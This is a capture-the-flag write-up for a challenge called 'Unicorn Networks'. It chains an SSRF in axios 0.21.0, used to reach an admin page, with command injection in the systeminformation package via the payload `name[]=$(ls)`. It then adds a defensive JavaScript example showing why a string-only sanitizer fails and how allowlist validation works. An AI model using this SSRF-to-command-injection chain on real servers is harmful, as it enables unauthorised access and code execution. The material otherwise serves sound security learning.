Unicorn Networks
Description
Protection of the admin section needs to be more robust...
Writeup
There is an API to fetch other URLs: `http://192.46.237.106:3000/api/getUrl?url=http://example.com`. I tried with some random IP and this one resulted in an error: `http://192.46.237.106:3000/api/getUrl?url=http://127.0.0.1`
Then I tried to send a request to `proxy.corp.local` but found nothing, stuck here for a while. A few moments later, I noticed the package name and the version in the response so I tried to google `axios 0.21.0 vuln`. Look what I found: Requests that follow a redirect are not passing via the proxy #3369
There is an SSRF vuln in this version so I created a simple proxy server:
I tried a few IPs and domains but found nothing, stuck again. Later on, I went back and checked the chall description again: Protection of the admin section needs to be more robust...
So I tried: `http://127.0.0.1/admin` and to my surprise, I got access to the admin page:
```html
<html>
<head><title>System information</title></head>
<body>
  <h2>Get OS Information</h2>
  <button onclick="retrieveOSInfo();false;">Retrieve</button>
  <h2>Get service info</h2>
  <input type="text" id="serviceName" value="nginx">
  <button onclick="retrieveServiceInfo();false;">Retrieve</button>
  <h2>Output</h2>
  <textarea id="output"></textarea>
</body>
<script>
function retrieveOSInfo() {
  fetch('/api/admin/os_info').then(response => {
    if (response.status == 200) {
      return response.json();
    }
    throw Error('Server is unavailable');
  }, failResponse => {
    printOutput('Server is unavailable');
  }).then(result => {
    printApiResult(result);
  }, errorMsg => {
    printOutput(errorMsg);
  });
}

function retrieveServiceInfo() {
  fetch('/api/admin/service_info?name=' + encodeURIComponent(serviceName.value)).then(response => {
    if (response.status == 200) {
      return response.json();
    }
    throw Error('Server is unavailable');
  }, failResponse => {
    printOutput('Server is unavailable');
  }).then(result => {
    printApiResult(result[0]);
  }, errorMsg => {
    printOutput(errorMsg);
  });
}

function printApiResult(jsonObject) {
  result = '';
  for (const [key, value] of Object.entries(jsonObject)) {
    result += `${key}: ${value}\n`;
  }
  printOutput(result);
}

function printOutput(content) {
  output.value = content;
}
</script>
</html>
```
There are two hidden API endpoints, I tried both and here is the response for the service one:
I googled the keyword: `running":true,"startmode":"","pids"` and realized that it's from a package called systeminformation. Let's do another round of search, `systeminformation vulnerability`. I found these two links:
The POC is quite useful, we can do command injection via `name[]=$(ls)`.
But I don't know how to do a reverse shell so I used another way, maybe stupid but works: https://stackoverflow.com/questions/15912924/how-to-send-file-contents-as-body-entity-using-curl
Got the flag in the end.
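
The array form `name[]=$(ls)` matters to defenders because a check written only for strings can be skipped when the query parser hands it an array. The following is an added example, not code from the writeup or from systeminformation, contrasting such a check with a strict type-and-allowlist validator for the service name; `parseQuery`, `weakSanitize`, `buildCommand` and the `systemctl status` template are hypothetical stand-ins.

```javascript
// Added example, not from the original writeup. Nothing is executed here;
// buildCommand only returns the string that would reach a shell.

// Hypothetical qs-style parser: "name[]=a" becomes { name: ["a"] }.
function parseQuery(queryString) {
  const out = Object.create(null);
  for (const [rawKey, value] of new URLSearchParams(queryString)) {
    if (rawKey.endsWith('[]')) {
      const key = rawKey.slice(0, -2);
      if (!Array.isArray(out[key])) out[key] = [];
      out[key].push(value);
    } else {
      out[rawKey] = value;
    }
  }
  return out;
}

// Constructed stand-in for a sanitizer written with only strings in mind:
// any other type is returned untouched.
function weakSanitize(value) {
  if (typeof value !== 'string') return value;
  return value.replace(/[$()`;|&<>]/g, '');
}

// Hypothetical command template; interpolation turns ["x"] back into "x".
function buildCommand(name) {
  return `systemctl status ${name}`;
}

// Hardened check: require a string and match it against an allowlist.
const SERVICE_NAME = /^[A-Za-z0-9_.@-]{1,64}$/;
function validateServiceName(value) {
  if (typeof value !== 'string' || !SERVICE_NAME.test(value)) {
    throw new TypeError('invalid service name');
  }
  return value;
}

// Constructed sample inputs: the page's default value and its PoC parameter.
function demo() {
  const benign = parseQuery('name=nginx').name;
  const crafted = parseQuery('name[]=$(ls)').name;
  let rejected = false;
  try { validateServiceName(crafted); } catch (e) { rejected = true; }
  return {
    weakResult: buildCommand(weakSanitize(crafted)),
    strictBenign: buildCommand(validateServiceName(benign)),
    rejected,
  };
}
console.log(demo());
```

Validation is only the first layer: passing the validated name as a separate argument to a process API that does not invoke a shell removes the interpolation step entirely.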